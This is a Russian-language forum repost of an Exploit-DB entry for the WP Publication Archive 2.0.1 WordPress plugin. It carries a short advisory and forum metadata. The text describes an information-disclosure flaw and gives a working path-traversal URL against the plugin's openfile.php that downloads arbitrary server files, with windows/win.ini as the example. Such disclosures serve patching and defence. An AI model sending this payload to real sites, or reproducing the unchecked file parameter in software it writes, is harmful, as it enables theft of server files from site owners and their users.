Exploit WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35263
Проверка EDB
  1. Пройдено
Автор
AUTOSEC TOOLS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-01-23
Код:
source: https://www.securityfocus.com/bid/46000/info

The WP Publication Archive Plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.

An attacker can exploit this issue to download arbitrary files from the affected application. This may allow the attacker to obtain sensitive information; other attacks are also possible.

WP Publication Archive 2.0.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini
 
Источник
www.exploit-db.com

Похожие темы